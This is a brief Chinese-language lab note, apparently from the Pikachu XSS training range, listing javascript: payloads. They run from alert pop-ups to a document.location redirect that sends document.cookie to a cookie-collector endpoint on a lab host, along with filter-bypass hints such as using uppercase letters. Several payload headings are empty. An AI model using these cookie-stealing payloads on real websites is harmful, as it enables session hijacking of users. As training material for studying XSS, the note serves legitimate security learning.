🍉
payload:

payload:

payload:

payload:
javascript:`${alert(1)}`
javascript:alert(2)
javascript:var cookie = document.cookie;alert(cookie);

先说下xss后台用法,如果构造一个请求为http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie=value
那后台就会写入一条cookie信息,相当于模拟了一个xss窃取用户cookie的过程
payload:


大写就能绕过
payload:
别用特殊符号
payload:
javascript:var cookie = document.cookie;alert(cookie);
paylaod:
javascript:document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie
单击a标签后,后台是有cookie记录的
payload:
'
